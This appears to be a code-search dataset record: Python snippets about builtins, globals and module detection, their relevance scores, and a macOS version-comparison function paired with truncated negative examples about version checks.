[ "def isbuiltin(object):\n if inspect.isbuiltin(object):\n return True\n\n return getattr(object, '__module__', None) == 'builtins'", "def is_builtin_name(name):\r\n if name.startswith('__') and name.endswith('__'):\r\n return ALL_LOWER_CASE_RE.match(name[2:-2]) is not None\r\n return False", "def global_exists(self, global_name):\n return self.evaluate('!(typeof %s === \"undefined\");' %\n global_name)", "def testFindsBuiltins(self):\r\n self.assertEqual('sys', modulefinder.get_module_filename('sys'))\r\n self.assertEqual('time', modulefinder.get_module_filename('time'))", "def has_global(node, name):\n return hasattr(node, \"globals\") and name in node.globals", "def is_builtins(self) -> bool:\n return self.source.startswith(self.builtins_import_string)", "def isbuiltin(object):\r\n return isinstance(object, types.BuiltinFunctionType)", "def _is_in_stdlib(module, some_object):\n # Clear PYTHONPATH temporarily and try importing the given module.\n original_sys_path = sys.path\n lib_path = os.path.dirname(traceback.__file__)\n sys.path = [lib_path]\n\n # On Mac, some extra library paths are required.\n if 'darwin' in platform.system().lower():\n for path in original_sys_path:\n if 'site-packages' not in path:\n sys.path.append(path)\n\n in_stdlib = False\n\n try:\n module = importlib.import_module(module)\n\n if some_object:\n getattr(module, some_object)\n\n in_stdlib = True\n except (ImportError, AttributeError):\n pass\n\n sys.path = original_sys_path\n\n return in_stdlib", "def test_core_object_types_global():\n for core_object_type in CORE_OBJECT_TYPES:\n core_object = get_object_from_string(core_object_type)\n assert core_object.__name__.lower() == core_object_type", "def test_global():\n global PATH, OS, collections, deque\n from os import path as PATH\n import os as OS\n import collections\n from collections import deque\n # make sure that these triggers unused-variable\n from sys import platform\n from sys import version as VERSION\n import this\n import re as RE", "def global_check(self):\n return None", "def is_ipython():\n return 'get_ipython' in globals()", "def _validate_builtin(_):\n pass", "def in_global_code(self):\n return self.sscope is None and self.lscope is None", "def __contains__(name):", "def is_builtin(fn) -> bool:\n return getattr(fn, TRITON_BUILTIN, False)", "def register(self, name, obj):\r\n self.eval_allowed_globals[name] = obj", "def _is_exported_name(name):\n # If ``check`` ever switches to using the ``__all__`` mechanism, update this code:\n return not name.startswith(\"_\")", "def ignore_builtin_verification():\n return not current_space().skip_builtin_verification", "def ioc(globals):\n\tfrom Module.Shapes.ShapeFactory import shape_factory\n\tglobals['shape_factory'] = shape_factory\n\tfrom Module.Lighting.Colors import Colors\n\tglobals['Colors'] = Colors", "def is_top_level_function(obj: Any) -> bool:\r\n return callable(obj) and obj.__name__ in sys.modules[obj.__module__].__dict__", "def is_builtin_type(tp):\n return hasattr(__builtins__, tp.__name__) and tp is getattr(__builtins__, tp.__name__)", "def is_mobu():\n\n return 'pyfbsdk' in main.__dict__", "def get_builtin(name):\n t = getattr(builtins, name)\n if isinstance(t, type):\n return t\n raise ValueError(name)", "def check_for_underscore(self):\n # If something injected a '_' variable in __builtin__, delete\n # ipython's automatic one so we don't clobber that. gettext() in\n # particular uses _, so we need to stay away from it.\n if '_' in __builtin__.__dict__:\n try:\n del self.shell.user_ns['_']\n except KeyError:\n pass", "def test_if_ipython():\n try:\n return __IPYTHON__\n except NameError:\n return False", "def dispatch_commands(_globals, _name_):\n try:\n argh.dispatch_commands([\n v for k, v in _globals.items()\n if isinstance(v, types.FunctionType)\n and v.__module__ == _name_\n and not k.startswith('_')\n and k != 'main'\n ])\n except KeyboardInterrupt:\n sys.exit(1)", "def register(obj_name, obj):\n if obj_name not in ninja_globals['register']:\n ninja_globals['register'][obj_name] = obj", "def test_swift_globals(self):\n self.build()\n self.do_test()", "def test_molecool_imported():\n assert \"molecool\" in sys.modules", "def test_already_registered_001(self):\n self._make_basic_environment(\n textwrap.dedent(\n \"\"\"\\\n from rez_lint.plugins.checkers import base_checker\n\n class Something(base_checker.BaseChecker):\n def run(package, context):\n return []\n \"\"\"\n )\n )\n\n cli._register_external_plugins.has_run = ( # pylint: disable=protected-access\n False\n )\n cli._register_external_plugins() # pylint: disable=protected-access", "def _check_name(self):\n\t\tpass", "def test_override_builtin(self):\n PyLoader.register(override_builtins=True)\n self.assertIs(PRIORITY_HOOKS['.py'], PyLoader)", "def lookup(name, frame, locals):\n if name in locals:\n return 'local', locals[name]\n if name in frame.f_globals:\n return 'global', frame.f_globals[name]\n if '__builtins__' in frame.f_globals:\n builtins = frame.f_globals['__builtins__']\n if isinstance(builtins, type({})):\n if name in builtins:\n return 'builtin', builtins[name]\n else:\n if hasattr(builtins, name):\n return 'builtin', getattr(builtins, name)\n return None, __UNDEF__", "def auto_load():\n if sys.startswith('linux'):\n pass", "def load_python_global(module, name):\n\n # The builtin module has been renamed in python3\n if module == '__builtin__' and six.PY3:\n module = 'builtins'\n module = importlib.import_module(module)\n return getattr(module, name)", "def is_term():\n global _STATIC_VARS\n return _STATIC_VARS.term", "def _load_objects():\n global DataArray, DataFrame, Series, Index, ndarray\n ndarray = np.ndarray\n DataArray = getattr(sys.modules.get('xarray', None), 'DataArray', ndarray)\n DataFrame = getattr(sys.modules.get('pandas', None), 'DataFrame', ndarray)\n Series = getattr(sys.modules.get('pandas', None), 'Series', ndarray)\n Index = getattr(sys.modules.get('pandas', None), 'Index', ndarray)", "def get_object_name(obj):\n\n namespace = dict(globals(), **locals()) \n return [name for name in namespace if namespace[name] is obj][0]", "def test_register_automatic(self):\n all_plugins = registry.get_checkers() + registry.get_contexts()\n self.assertFalse(\"Something\" in {plugin.__name__ for plugin in all_plugins})\n\n self._make_basic_environment(\n textwrap.dedent(\n \"\"\"\\\n from rez_lint.plugins.checkers import base_checker\n\n class Something(base_checker.BaseChecker):\n def run(package, context):\n return []\n \"\"\"\n )\n )\n\n all_plugins = registry.get_checkers() + registry.get_contexts()\n self.assertTrue(\"Something\" in {plugin.__name__ for plugin in all_plugins})", "def init():\n global PLUGIN_NAME\n PLUGIN_NAME = inspect.currentframe().f_code.co_filename", "def __missing__(self, key):\n if key in dir(__builtins__):\n return getattr(__builtins__, key)\n try:\n return RecursiveImportingModule(\n import_module(self.aliases.get(key, key)))\n except ImportError:\n exc = NameError(\"name '{}' is not defined\".format(key))\n exc.__cause__ = None\n raise exc", "def hasattr(x, name) -> bool:\n pass", "def is_defect_name(global_name):\n return '.defects:' in global_name", "def test_globals(self):\n self.assertNotEqual(Languages.LANGUAGES_FILE, None)\n self.assertEqual(Languages._languagesDict, None)", "def error_handlings():\n\n global_names = globals()\n for name in global_names:\n if name.startswith(\"provoke_and_handle_\"):\n print(\"\\nAUFRUF von '{}':\".format(name))\n global_names[name]()", "def _is_rr_present() -> bool:\n\n # this is ugly but I couldn't find a better way to do it\n # feel free to refactor it\n globals_list_literal_str = gdb.execute(\"python print(list(globals().keys()))\", to_string=True)\n interpreter_globals = ast.literal_eval(globals_list_literal_str)\n\n return \"RRCmd\" in interpreter_globals and \"RRWhere\" in interpreter_globals", "def check_cachable(self, codelib):\n return not codelib.has_dynamic_globals", "def hasattr_silent(object, name):\n\n try:\n if not object:\n return False\n return hasattr(object, name)\n except AttributeError:\n return False", "def pyname(ifmain=False):\n\n if ifmain is True:\n return __name__ == \"__main__\"\n return __name__", "def register_globals ():\n\n # This feature is used to determine which OS we're on.\n # In future, this may become <target-os> and <host-os>\n # TODO: check this. Compatibility with bjam names? Subfeature for version?\n os = sys.platform\n feature.feature ('os', [os], ['propagated', 'link-incompatible'])\n\n\n # The two OS features define a known set of abstract OS names. The host-os is\n # the OS under which bjam is running. Even though this should really be a fixed\n # property we need to list all the values to prevent unknown value errors. Both\n # set the default value to the current OS to account for the default use case of\n # building on the target OS.\n feature.feature('host-os', __os_names)\n feature.set_default('host-os', default_host_os())\n\n feature.feature('target-os', __os_names, ['propagated', 'link-incompatible'])\n feature.set_default('target-os', default_host_os())\n\n feature.feature ('toolset', [], ['implicit', 'propagated' ,'symmetric'])\n\n feature.feature ('stdlib', ['native'], ['propagated', 'composite'])\n\n feature.feature ('link', ['shared', 'static'], ['propagated'])\n feature.feature ('runtime-link', ['shared', 'static'], ['propagated'])\n feature.feature ('runtime-debugging', ['on', 'off'], ['propagated'])\n\n\n feature.feature ('optimization', ['off', 'speed', 'space'], ['propagated'])\n feature.feature ('profiling', ['off', 'on'], ['propagated'])\n feature.feature ('inlining', ['off', 'on', 'full'], ['propagated'])\n\n feature.feature ('threading', ['single', 'multi'], ['propagated'])\n feature.feature ('rtti', ['on', 'off'], ['propagated'])\n feature.feature ('exception-handling', ['on', 'off'], ['propagated'])\n\n # Whether there is support for asynchronous EH (e.g. catching SEGVs).\n feature.feature ('asynch-exceptions', ['off', 'on'], ['propagated'])\n\n # Whether all extern \"C\" functions are considered nothrow by default.\n feature.feature ('extern-c-nothrow', ['off', 'on'], ['propagated'])\n\n feature.feature ('debug-symbols', ['on', 'off'], ['propagated'])\n feature.feature ('define', [], ['free'])\n feature.feature ('undef', [], ['free'])\n feature.feature ('include', [], ['free', 'path']) #order-sensitive\n feature.feature ('cflags', [], ['free'])\n feature.feature ('cxxflags', [], ['free'])\n feature.feature ('asmflags', [], ['free'])\n feature.feature ('linkflags', [], ['free'])\n feature.feature ('archiveflags', [], ['free'])\n feature.feature ('version', [], ['free'])\n\n feature.feature ('location-prefix', [], ['free'])\n\n feature.feature ('action', [], ['free'])\n\n\n # The following features are incidental, since\n # in themself they have no effect on build products.\n # Not making them incidental will result in problems in corner\n # cases, for example:\n #\n # unit-test a : a.cpp : <use>b ;\n # lib b : a.cpp b ;\n #\n # Here, if <use> is not incidental, we'll decide we have two\n # targets for a.obj with different properties, and will complain.\n #\n # Note that making feature incidental does not mean it's ignored. It may\n # be ignored when creating the virtual target, but the rest of build process\n # will use them.\n feature.feature ('use', [], ['free', 'dependency', 'incidental'])\n feature.feature ('dependency', [], ['free', 'dependency', 'incidental'])\n feature.feature ('implicit-dependency', [], ['free', 'dependency', 'incidental'])\n\n feature.feature('warnings', [\n 'on', # Enable default/\"reasonable\" warning level for the tool.\n 'all', # Enable all possible warnings issued by the tool.\n 'off'], # Disable all warnings issued by the tool.\n ['incidental', 'propagated'])\n\n feature.feature('warnings-as-errors', [\n 'off', # Do not fail the compilation if there are warnings.\n 'on'], # Fail the compilation if there are warnings.\n ['incidental', 'propagated'])\n\n feature.feature('c++-template-depth',\n [str(i) for i in range(64,1024+1,64)] +\n [str(i) for i in range(20,1000+1,10)] +\n # Maximum template instantiation depth guaranteed for ANSI/ISO C++\n # conforming programs.\n ['17'],\n ['incidental', 'optional', 'propagated'])\n\n feature.feature ('source', [], ['free', 'dependency', 'incidental'])\n feature.feature ('library', [], ['free', 'dependency', 'incidental'])\n feature.feature ('file', [], ['free', 'dependency', 'incidental'])\n feature.feature ('find-shared-library', [], ['free']) #order-sensitive ;\n feature.feature ('find-static-library', [], ['free']) #order-sensitive ;\n feature.feature ('library-path', [], ['free', 'path']) #order-sensitive ;\n # Internal feature.\n feature.feature ('library-file', [], ['free', 'dependency'])\n\n feature.feature ('name', [], ['free'])\n feature.feature ('tag', [], ['free'])\n feature.feature ('search', [], ['free', 'path']) #order-sensitive ;\n feature.feature ('location', [], ['free', 'path'])\n\n feature.feature ('dll-path', [], ['free', 'path'])\n feature.feature ('hardcode-dll-paths', ['true', 'false'], ['incidental'])\n\n\n # This is internal feature which holds the paths of all dependency\n # dynamic libraries. On Windows, it's needed so that we can all\n # those paths to PATH, when running applications.\n # On Linux, it's needed to add proper -rpath-link command line options.\n feature.feature ('xdll-path', [], ['free', 'path'])\n\n #provides means to specify def-file for windows dlls.\n feature.feature ('def-file', [], ['free', 'dependency'])\n\n # This feature is used to allow specific generators to run.\n # For example, QT tools can only be invoked when QT library\n # is used. In that case, <allow>qt will be in usage requirement\n # of the library.\n feature.feature ('allow', [], ['free'])\n\n # The addressing model to generate code for. Currently a limited set only\n # specifying the bit size of pointers.\n feature.feature('address-model', ['16', '32', '64'], ['propagated', 'optional'])\n\n # Type of CPU architecture to compile for.\n feature.feature('architecture', [\n # x86 and x86-64\n 'x86',\n\n # ia64\n 'ia64',\n\n # Sparc\n 'sparc',\n\n # RS/6000 & PowerPC\n 'power',\n\n # MIPS/SGI\n 'mips1', 'mips2', 'mips3', 'mips4', 'mips32', 'mips32r2', 'mips64',\n\n # HP/PA-RISC\n 'parisc',\n\n # Advanced RISC Machines\n 'arm',\n\n # Combined architectures for platforms/toolsets that support building for\n # multiple architectures at once. \"combined\" would be the default multi-arch\n # for the toolset.\n 'combined',\n 'combined-x86-power'],\n\n ['propagated', 'optional'])\n\n # The specific instruction set in an architecture to compile.\n feature.feature('instruction-set', [\n # x86 and x86-64\n 'native', 'i486', 'i586', 'i686', 'pentium', 'pentium-mmx', 'pentiumpro', 'pentium2', 'pentium3',\n 'pentium3m', 'pentium-m', 'pentium4', 'pentium4m', 'prescott', 'nocona', 'core2', 'corei7', 'corei7-avx', 'core-avx-i',\n 'conroe', 'conroe-xe', 'conroe-l', 'allendale', 'merom', 'merom-xe', 'kentsfield', 'kentsfield-xe', 'penryn', 'wolfdale',\n 'yorksfield', 'nehalem', 'sandy-bridge', 'ivy-bridge', 'haswell', 'k6', 'k6-2', 'k6-3', 'athlon', 'athlon-tbird', 'athlon-4', 'athlon-xp',\n 'athlon-mp', 'k8', 'opteron', 'athlon64', 'athlon-fx', 'k8-sse3', 'opteron-sse3', 'athlon64-sse3', 'amdfam10', 'barcelona',\n 'bdver1', 'bdver2', 'bdver3', 'btver1', 'btver2', 'winchip-c6', 'winchip2', 'c3', 'c3-2', 'atom',\n\n # ia64\n 'itanium', 'itanium1', 'merced', 'itanium2', 'mckinley',\n\n # Sparc\n 'v7', 'cypress', 'v8', 'supersparc', 'sparclite', 'hypersparc', 'sparclite86x', 'f930', 'f934',\n 'sparclet', 'tsc701', 'v9', 'ultrasparc', 'ultrasparc3',\n\n # RS/6000 & PowerPC\n '401', '403', '405', '405fp', '440', '440fp', '505', '601', '602',\n '603', '603e', '604', '604e', '620', '630', '740', '7400',\n '7450', '750', '801', '821', '823', '860', '970', '8540',\n 'power-common', 'ec603e', 'g3', 'g4', 'g5', 'power', 'power2',\n 'power3', 'power4', 'power5', 'powerpc', 'powerpc64', 'rios',\n 'rios1', 'rsc', 'rios2', 'rs64a',\n\n # MIPS\n '4kc', '4kp', '5kc', '20kc', 'm4k', 'r2000', 'r3000', 'r3900', 'r4000',\n 'r4100', 'r4300', 'r4400', 'r4600', 'r4650',\n 'r6000', 'r8000', 'rm7000', 'rm9000', 'orion', 'sb1', 'vr4100',\n 'vr4111', 'vr4120', 'vr4130', 'vr4300',\n 'vr5000', 'vr5400', 'vr5500',\n\n # HP/PA-RISC\n '700', '7100', '7100lc', '7200', '7300', '8000',\n\n # Advanced RISC Machines\n 'armv2', 'armv2a', 'armv3', 'armv3m', 'armv4', 'armv4t', 'armv5',\n 'armv5t', 'armv5te', 'armv6', 'armv6j', 'iwmmxt', 'ep9312'],\n\n ['propagated', 'optional'])\n\n feature.feature('conditional', [], ['incidental', 'free'])\n\n # The value of 'no' prevents building of a target.\n feature.feature('build', ['yes', 'no'], ['optional'])\n\n # Windows-specific features\n feature.feature ('user-interface', ['console', 'gui', 'wince', 'native', 'auto'], [])\n feature.feature ('variant', [], ['implicit', 'composite', 'propagated', 'symmetric'])\n\n\n variant ('debug', ['<optimization>off', '<debug-symbols>on', '<inlining>off', '<runtime-debugging>on'])\n variant ('release', ['<optimization>speed', '<debug-symbols>off', '<inlining>full',\n '<runtime-debugging>off', '<define>NDEBUG'])\n variant ('profile', ['release'], ['<profiling>on', '<debug-symbols>on'])", "def test_get_module_qualname_from_path_sys(self):\n\n name = b_utils.get_module_qualname_from_path(os.__file__)\n self.assertEqual(\"os\", name)\n\n # This will fail because of magic for os.path. Not sure how to fix.\n # name = b_utils.get_module_qualname_from_path(os.path.__file__)\n # self.assertEqual(name, 'os.path')", "def isclassinstance(object):\n if not hasattr(object, \"__class__\"):\n return False\n if isbuiltin(object.__class__):\n return False\n return True", "def _check_add_locals(frame, frame_num, total_frames):\n # Include the last frames locals\n # Include any frame locals that came from a file in the project's root\n return any(((frame_num == total_frames - 1),\n ('root' in SETTINGS and (frame.get('filename') or '').lower().startswith((SETTINGS['root'] or '').lower()))))", "def globals_load(plugin_context, globals_, symbols):\n for g in [plugin_context.rosh_globals, globals_]:\n if g is not None:\n g.update(symbols)", "def _is_type_in_scope(self, name):", "def full_object_name(obj):\n\n try:\n module = obj.__module__\n if module is None or module == str.__class__.__module__:\n return obj.__name__ # Avoid reporting __builtin__\n else:\n return module + '.' + obj.__name__\n except Exception:\n return None", "def test_no_shadowed_builtins(command_name, command_table, builtins):\n errors = []\n for sub_name, sub_command in command_table.items():\n op_help = sub_command.create_help_command()\n arg_table = op_help.arg_table\n for arg_name in arg_table:\n if any(p.startswith(arg_name) for p in builtins):\n # Then we are shadowing or prefixing a top level argument\n errors.append(\n 'Shadowing/Prefixing a top level option: '\n '%s.%s.%s' % (command_name, sub_name, arg_name))\n if errors:\n raise AssertionError('\\n' + '\\n'.join(errors))", "def is_imported():\n return len(inspect.stack()) > 3", "def __contains__(self, name):\n return name in self._modules", "def _addGlobals(self, globalsDict):\n globalsDict['obj'] = None\n globalsDict['role'] = None\n globalsDict['pyatspi'] = pyatspi", "def has_global_storage(self, name: str) -> bool:\n return name in self.global_storage", "def builtin(self):\n return BuiltIn()", "def test_xchemOT_imported():\n assert \"xchemOT\" in sys.modules", "def is_object_identification_module(self):\n return True", "def test_plugins(self):\n from omtk import plugin_manager\n pm = plugin_manager.plugin_manager\n\n loaded_plugin_names = [plugin.cls.__name__ for plugin in pm.get_loaded_plugins_by_type('modules')]\n\n builtin_plugin_names = (\n 'Arm',\n 'FK',\n 'AdditiveFK',\n 'AvarGrpOnSurface',\n 'FaceBrow',\n 'FaceEyeLids',\n 'FaceEyes',\n 'FaceJaw',\n 'FaceLips',\n 'FaceNose',\n 'FaceSquint',\n 'Hand',\n 'Head',\n 'IK',\n 'InteractiveFK',\n 'Leg',\n 'LegQuad',\n 'Limb',\n 'Neck',\n 'Ribbon',\n 'SplineIK',\n 'Twistbone',\n )\n\n for plugin_name in builtin_plugin_names:\n self.assertIn(plugin_name, loaded_plugin_names)", "def is_import(self):\n return self.sh_info is None and (self.binding == 'STB_GLOBAL' or \\\n self.binding == 'STB_WEAK' or \\\n self.binding == 'STT_FUNC')", "def test_non_namespaced_object_name(\n self, get_context_mock, get_library_instance_mock\n ):\n with mock.patch.object(CumulusCI, \"get_namespace_prefix\", return_value=\"\"):\n po = PageObjects(FOO_PATH)\n\n FooTestPage = importer.import_class_or_module_by_path(FOO_PATH)\n MockGetLibraryInstance.libs[\"FooTestPage\"] = _PageObjectLibrary(\n FooTestPage()\n )\n\n pobj = po.get_page_object(\"Test\", \"Foo__c\")\n self.assertEqual(pobj.object_name, \"Foo__c\")", "def inspect_builtin(obj):\n\n print_with_indent(\"+Builtin Function: %s\" % obj.__name__)\n indent()\n print_docstr(obj)\n dedent()\n print()", "def test_check_module(self) -> None:\n check_module(\"os\")", "def exists(_env):\n detector = DetectCompiler()\n if detector['icx'] is None:\n return False\n return True", "def _is_run_type(cls, object_):\n # Do a string comparison instead of using isinstance() to avoid needing\n # to import lyse or other modules with these classes.\n return (type(object_).__name__ in cls._RUN_TYPES)", "def _ofind(self,oname):\n\n # the @ in magics isn't really part of the name\n oname = oname.strip()\n if oname.startswith('@'):\n oname = oname[1:]\n\n # Namespaces to search in:\n user_ns = self.shell.user_ns\n user_config_ns = self.shell.user_config_ns\n internal_ns = self.shell.internal_ns\n builtin_ns = __builtin__.__dict__\n\n # Put them in a list. The order is important so that we find things in the\n # same order that Python finds them.\n namespaces = [ ('Interactive',user_ns),\n ('User-defined configuration',user_config_ns),\n ('IPython internal',internal_ns),\n ('Python builtin',builtin_ns)\n ]\n\n # initialize results to 'null'\n found = 0; obj = None; ospace = None; ds = None; ismagic = 0\n\n try:\n for nsname,ns in namespaces:\n try:\n obj = ns[oname]\n except KeyError:\n pass\n else:\n found = 1\n ospace = nsname\n ds = inspect.getdoc(obj)\n raise 'found it'\n except 'found it':\n pass\n\n # try to see if it's magic\n if not found:\n try:\n obj = eval('self.magic_'+oname)\n found = 1\n ospace = 'IPython internal'\n ismagic = 1\n ds = inspect.getdoc(obj)\n except:\n pass\n # Play some games to try and find info about dotted objects\n # and for things like {}.get? or ''.remove? to work\n if not found:\n try:\n self.tmp_obj = eval(oname,user_ns)\n found = 1\n except:\n try:\n self.tmp_obj = eval(oname,builtin_ns)\n found = 1\n except:\n pass\n if found:\n ds = inspect.getdoc(self.tmp_obj)\n ospace = 'Currently not defined in user session.'\n obj = self.tmp_obj\n del self.tmp_obj\n return found,obj,ospace,ds,ismagic", "def help() : \n\n import types\n\n globs = globals()\n for key, val in globs.iteritems() :\n if isinstance(val, types.FunctionType ) :\n print key\n #for obj in globals() :\n # print obj\n # print obj.callable()\n print globals()['main'].__doc__", "def test_stepregistry_module_should_have_global_registry_instance():\n # given & when\n from radish.stepregistry import registry\n\n # then\n assert isinstance(registry, StepRegistry)", "def test_hookregistry_module_should_have_global_registry_instance():\n # given & when\n from radish.hookregistry import registry\n\n # then\n assert isinstance(registry, HookRegistry)", "def provoke_and_handle_NameError():\n try:\n print(bliblablub)\n except NameError as ne:\n print(f\"Sorry! {ne}\")", "def reentrant_load(loaded_symbols, globals_):\n if loaded_symbols is not None:\n if globals_ is not None:\n globals_.update(loaded_symbols)\n return True\n else:\n return False", "def get_functions():\n\treturn [f for f in globals() if f.startswith('make_')]", "def _isobject(self, name, exist):\r\n if exist in [2, 5]:\r\n return False\r\n cmd = \"isobject(%s)\" % name\r\n if not self._engine:\r\n msg = \"Session is not open\"\r\n raise Oct2PyError(msg)\r\n resp = self._engine.eval(cmd, silent=True).strip()\r\n return resp == \"ans = 1\"", "def test_mmelemental_imported():\n import sys\n\n assert \"mmelemental\" in sys.modules", "def main():\n check_slugs()\n check_identifiers()", "def _is_str_matching_builtin_type(str_value: str) -> bool:\n builtin_types = [\n getattr(builtins, d)\n for d in dir(builtins)\n if isinstance(getattr(builtins, d), type)\n ]\n return f\"<class '{str_value}'>\" in [str(bt) for bt in builtin_types]", "def _LoadGlobalSymbolsFromDump(dump_obj):\n symbols = set()\n for key in (\"elf_functions\", \"elf_objects\"):\n symbols.update(\n symbol.get(\"name\", \"\") for symbol in dump_obj.get(key, []) if\n symbol.get(\"binding\", \"global\") == \"global\")\n return symbols", "def test_ufedmm_imported():\n assert \"ufedmm\" in sys.modules", "def _running_under_regular_virtualenv():\n # pypa/virtualenv case\n return hasattr(sys, \"real_prefix\")", "def _is_plugin_name(name):\n return name in _path_cache and name in _module_cache", "def builtin(self) :\n try :\n return self._builtin\n except Exception as e:\n raise e", "def test_override_builtin_extension_without_explicit_flag(self):\n with self.assertRaises(ValueError):\n PyLoader.register()", "def test_already_registered_002(self):\n\n class MyChecker(object):\n \"\"\"Do nothing.\"\"\"\n\n @staticmethod\n def get_long_code():\n \"\"\"Do nothing.\"\"\"\n return \"something\"\n\n @staticmethod\n def get_order():\n \"\"\"Do nothing.\"\"\"\n return 0\n\n @staticmethod\n def run(_, __):\n \"\"\"Do nothing.\"\"\"\n return []\n\n class MyContext(object):\n \"\"\"Do nothing.\"\"\"\n\n @staticmethod\n def get_order():\n \"\"\"Do nothing.\"\"\"\n return 0\n\n @staticmethod\n def run(_, __):\n \"\"\"Do nothing.\"\"\"\n return\n\n registry.register_checker(MyChecker)\n\n with self.assertRaises(EnvironmentError):\n registry.register_checker(MyChecker)\n\n registry.register_context(MyContext)\n\n with self.assertRaises(EnvironmentError):\n registry.register_context(MyContext)", "def find_class(self, module, name):\n raise pickle.UnpicklingError(\"global '%s.%s' is forbidden\" %\n (module, name))", "def __exist_module_in_sys_cache(module_name):\n try:\n if hasattr(sys, 'stypy_module_cache'):\n return module_name in sys.stypy_module_cache\n else:\n __preload_sys_module_cache()\n return False\n except:\n return False", "def is_unreal():\n\n try:\n import unreal\n except ImportError:\n return False\n\n return True", "def is_nuke():\n try:\n import _nuke\n return True\n except ImportError:\n return False", "def builtin(self) :\n\t\ttry :\n\t\t\treturn self._builtin\n\t\texcept Exception as e:\n\t\t\traise e", "def is_houdini():\n\n return 'hou' in main.__dict__", "def _find_labelled_objects_functions():\n\n def _num_args_without_default_value(fn_sig):\n return len(\n [\n param\n for param in fn_sig.parameters.values()\n if param.default is inspect._empty\n ]\n )\n\n def _takes_object_labels_kwarg(fn):\n fn_sig = inspect.signature(fn)\n return (\n \"object_labels\" in fn_sig.parameters\n and _num_args_without_default_value(fn_sig) == 1\n )\n\n fns = [\n (fn_name, fn)\n for (fn_name, fn) in inspect.getmembers(\n sys.modules[__name__], inspect.isfunction\n )\n if not fn_name.startswith(\"_\") and _takes_object_labels_kwarg(fn)\n ]\n\n return dict(fns)", "def test_setup_object_without__all__name__(self):\n with self.assertRaises(AttributeError):\n pluggable_package.setup(self._test_object)", "def has_appname(appname):\n return appname in Registry.monomers", "def test_constructors(self, name, obj):\n assert getattr(forge, name) == obj" ]
[ "0.6845686", "0.64684844", "0.64186686", "0.63405824", "0.6296543", "0.6213715", "0.60902375", "0.60629964", "0.60133064", "0.5856874", "0.5762603", "0.57043445", "0.56223327", "0.56172764", "0.55805594", "0.5576068", "0.5568513", "0.5556084", "0.55383843", "0.5527319", "0.5527259", "0.55162597", "0.5487715", "0.54780805", "0.5468831", "0.5442787", "0.5433667", "0.5423802", "0.541526", "0.54051715", "0.53872156", "0.53828967", "0.53602433", "0.5316119", "0.5313921", "0.5311174", "0.5310279", "0.5310252", "0.5303675", "0.5303383", "0.5298816", "0.5296683", "0.5295508", "0.52944064", "0.52924067", "0.52806675", "0.5276805", "0.52539736", "0.5244359", "0.523558", "0.5229628", "0.5228405", "0.52263844", "0.5217105", "0.52035433", "0.5201077", "0.52001286", "0.5185346", "0.5184184", "0.51814616", "0.51612234", "0.5148414", "0.5141066", "0.513786", "0.5132176", "0.51305187", "0.51284426", "0.51167846", "0.51162815", "0.5115532", "0.5111074", "0.508782", "0.5086088", "0.5081827", "0.5079104", "0.50782365", "0.50776225", "0.507494", "0.5070939", "0.505836", "0.50502527", "0.50471985", "0.5043381", "0.5035273", "0.5032975", "0.50285184", "0.5022368", "0.5018452", "0.5003263", "0.49937204", "0.498874", "0.4987062", "0.49863425", "0.49729276", "0.49712515", "0.49681515", "0.49641317", "0.49570674", "0.49566212", "0.4944227" ]
0.7423229
0
Pass a string in the format 'x.x.x'. Will check that this MacOSX version is at least that version. The 3rd micro number is optional
def isOSXVersionAtLeast(compareVersion): # type: (basestring) -> bool try: if not Platform.isOSX(): return False def convertVersion(convertString): _os_major = _os_minor = _os_micro = 0 _versionNumbers = [] for versionPart in StringUtils.splitIntoList(convertString, '.'): strippedPart = StringUtils.stripNonNumbers(versionPart, '.') if (StringUtils.isInteger(strippedPart)): _versionNumbers.append(Integer.valueOf(Integer.parseInt(strippedPart))) else: _versionNumbers.append(0) if len(_versionNumbers) >= 1: _os_major = max(0, _versionNumbers[0]) if len(_versionNumbers) >= 2: _os_minor = max(0, _versionNumbers[1]) if len(_versionNumbers) >= 3: _os_micro = max(0, _versionNumbers[2]) return _os_major, _os_minor, _os_micro os_major, os_minor, os_micro = convertVersion(System.getProperty("os.version", "0.0.0")) myPrint("DB", "MacOS Version number(s): %s.%s.%s" %(os_major, os_minor, os_micro)) if not isinstance(compareVersion, basestring) or len(compareVersion) < 1: myPrint("B", "ERROR: Invalid compareVersion of '%s' passed - returning False" %(compareVersion)) return False chk_os_major, chk_os_minor, chk_os_micro = convertVersion(compareVersion) myPrint("DB", "Comparing against Version(s): %s.%s.%s" %(chk_os_major, chk_os_minor, chk_os_micro)) if os_major < chk_os_major: return False if os_major > chk_os_major: return True if os_minor < chk_os_minor: return False if os_minor > chk_os_minor: return True if os_micro < chk_os_micro: return False return True except: myPrint("B", "ERROR: isOSXVersionAtLeast() failed - returning False") dump_sys_error_to_md_console_and_errorlog() return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def check_from_version(version: str) -> str:\n version_int = [int(v) for v in version.split(\".\")]\n if version_int[0] not in PipetteModelMajorVersion:\n raise ValueError(f\"Major version {version_int[0]} is not supported.\")\n if version_int[1] not in PipetteModelMinorVersion:\n raise ValueError(f\"Minor version {version_int[1]} is not supported.\")\n return version", "def _is_python_version(s: str) -> bool:\n\n return s.startswith(\"2\") or s.startswith(\"3\")", "def check_version_str(version):\n if not version.startswith('v') and version != 'current':\n version = 'v%s' % version\n return version", "def is_stable_version(version):\n if not isinstance(version, tuple):\n version = version.split('.')\n last_part = version[-1]\n\n if not re.search('[a-zA-Z]', last_part):\n return True\n else:\n return False", "def __check_nm_version(self):\n try:\n proxy = self.bus.get_object(\n self.system_service_name, \"/org/freedesktop/NetworkManager\")\n props = dbus.Interface(proxy, \"org.freedesktop.DBus.Properties\")\n version = props.Get(\"org.freedesktop.NetworkManager\", \"Version\")\n except dbus.exceptions.DBusException:\n version = \"0.8\"\n if re.match(r'^1\\.', version):\n self.nm_version = \"1.0\"\n return\n if re.match(r'^0\\.9', version):\n self.nm_version = \"0.9\"\n return\n if re.match(r'^0\\.8', version):\n self.nm_version = \"0.8\"\n return\n self.nm_version = Messages.unknown_version", "def check_python_version(match, current=None):\n if current is None:\n current = list(sys.version_info[:3])\n if not isinstance(match, list):\n match = [match]\n for m in match:\n minimal = False\n if isinstance(m, float):\n m = str(m)\n if m.endswith(\"+\"):\n minimal = True\n m = m[:-1]\n # assert m[0].isdigit()\n # assert m[-1].isdigit()\n m = [int(x) for x in m.split(\".\")]\n current_len = current[: len(m)]\n # print(m, current, current_len)\n if minimal:\n if current_len >= m:\n return True\n else:\n if current_len == m:\n return True\n return False", "def is_new_osx():\n name = distutils.util.get_platform()\n if sys.platform != \"darwin\":\n return False\n elif name.startswith(\"macosx-10\"):\n 